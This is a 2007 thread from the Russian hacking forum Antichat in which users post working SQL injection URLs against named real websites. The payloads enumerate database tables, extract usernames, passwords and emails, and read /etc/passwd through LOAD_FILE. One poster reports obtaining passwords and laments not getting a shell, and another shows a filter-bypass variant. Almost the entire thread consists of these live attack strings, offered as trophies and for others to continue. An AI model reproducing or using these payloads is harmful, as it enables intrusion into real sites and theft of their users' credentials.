Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
15.08.2007, 23:39
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122
Репутация:
874
|
|
http://www.chita.ru/firms/index.php?page=view&id=-9302+union+select+1,2,3,4,5,table_name,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24+from+infor mation_schema.tables+WHERE+TABLE_NAME+NOT+IN+(CHAR (67,72,65,82,65,67,84,69,82,95,83,69,84,83))/*
Вот решил запостить, мне понравилось тут раскапывать. Интересно работать с пятой версией мускула но...
Таблицы найдены, пароли получены, вот только куда их подставлять я не нашел - может кто докопает. Я эту скулю у себя хранил долго, покуда не разузнал про пятую версию мускула, а потом ковырялся в старых залежах набрал version() и о чудо 5.ХХ.ХХ, а это значит можно узнать все таблицы и т.д.!!!!!
Вот кстати и таблички
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
auth_user id, site_id, username, password, permis, userlevel - это столбики
forget_psw
images
inetcat_anti_cheat
proxys
sessions
sites
user_tables
user_tables_fields
user_tables_params
ut_afisha
ut_brd
ut_brd_users
ut_citys
ut_firm_offers
ut_firms
ut_inetcat
ut_money
ut_news
ut_news_nlist
ut_offer_types
ut_sources
ut_tv
ut_tv_descrs
ut_tv_genres
Жаль до шелла не дошло.... может кто???..., а нет так и ладно
|
|
|
16.08.2007, 02:02
|
|
Новичок
Регистрация: 11.08.2007
Сообщений: 25
Провел на форуме:
131466
Репутация:
11
|
|
Код:
http://hells.timeserv.biz/cms/page_view.php?id=110+union+select+1,2,password,admin+from+settings/*
version 4.1.21-standard
Последний раз редактировалось Nazaret2005; 16.08.2007 в 02:04..
|
|
|
|
16.08.2007, 14:26
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287
Репутация:
4738
|
|
Код:
_http://www.hudaweb.com/movlit//autor.php?autor=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
Зы со скриптом подбор колонок стал намного быстрее...
P.S. Скрипт можно взять тут: https://forum.antichat.ru/thread46849.html
Удачных скулей! |
|
|
|
16.08.2007, 14:42
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287
Репутация:
4738
|
|
Код:
_http://www.elforat.net/autor.php?id=-1+union+select+1,2,3,4,5/*
Код:
http://www.bajazzoverlag.ch/autor.php?id=-1+union+select+1,2,3,4,5,6,7/*
Код:
_http://www.3darena.de/autor/php/autor.php?autor_id=-1+union+select+concat(user(),version())/*
Последний раз редактировалось -=lebed=-; 16.08.2007 в 15:03..
|
|
|
|
16.08.2007, 19:42
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489
Репутация:
1359
|
|
вэб-дизайн Студия 5d.ru 
Код:
http://www.iq-design.ru/content.php?act=tehnolog&div=-6+union+select+1,version(),3,4+from+news/*
Код:
http://www.nikas-s.ru/gallery.php?tab=photo&dir=-3+union+select+1,2,3,version(),5,6/*
Код:
http://www.interstahl.ru/?act=news&id=-2+union+select+1,2,3,4,5,user()
Код:
http://www.countrytravel.ru/second.php?act=main&div=-2+union+select+1,2,version(),4,5/*
Код:
http://www.razvod.ru/man.php?id=-651+union+select+1,2,3,concat_ws(0x3a,name,version()),5,6,7,8,9+from+authors/*
Код:
http://www.albitec.ru/content.php?cat=news&id=-25+union+select+1,2,3,4,5,6,7,8/*
Код:
http://www.interfax-religion.ru/?act=dujour&div=-275+union+select+1,version(),3,4,5,6,7,8,9,10/*
Код:
http://www.hifitech.ru/?act=product&id=-2632+union+select+1/*
Код:
http://www.kiyama.ru/content.php?act=mnu&browse=node&id=-64+union+select+1,2,3,4,5,6,7,8/*
Код:
http://www.bladeserver.ru/?act=news&id=-7+union+select+1,2,3,4,char(60,98,114,62,60,98,62,65,52,97,116,45,114,117,108,101,122,122,122,122,60,47,98,62),6,7,8,9/*
ребята очень упорно плодят уязвимые сайты
|
|
|
|
16.08.2007, 19:46
|
|
Banned
Регистрация: 15.07.2007
Сообщений: 39
Провел на форуме:
1122110
Репутация:
43
|
|
Моя первая SQL Инъекция :\
Код:
http://www.rapha.cc/index.php?page=-1+union+select+1,2,LOAD_FILE('/etc/passwd'),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
|
|
|
|
17.08.2007, 00:57
|
|
Новичок
Регистрация: 11.08.2007
Сообщений: 25
Провел на форуме:
131466
Репутация:
11
|
|
Sharelita !
http://www.sharelita.com/newsfile.php?fileid=-10+union+select+id,2,3,4,concat(name,char(58),pass word),6,7,8,9,10,email+from+users+where+id=2+limit +0,1/*
|
|
|
|
17.08.2007, 03:05
|
|
Новичок
Регистрация: 16.08.2007
Сообщений: 5
Провел на форуме:
20992
Репутация:
4
|
|
Код:
http://www.anewpark.ca/parkupdate.php?id=-1+union+select+1,2,3,4,5/*
http://www.nonom.cn/showmz.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
|
|
|
|
17.08.2007, 10:15
|
|
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838
Репутация:
770
|
|
http://wow.crpg.ru/article.php?sid=-1+union+select+database(),2,version(),4,5,6,7,user (),9,10,11,12/*
дальше не пошло =(
|
|
|
|
17.08.2007, 11:00
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122
Репутация:
874
|
|
По моему тут надо таким способом, а иначе фильтрация работает...
http://wow.crpg.ru/article.php?sid=-1+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(versi on(),0x71),0x71),5,6,7,8,9,10,11,12/*
З.Ы. Но дальше тоже не пошло  |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
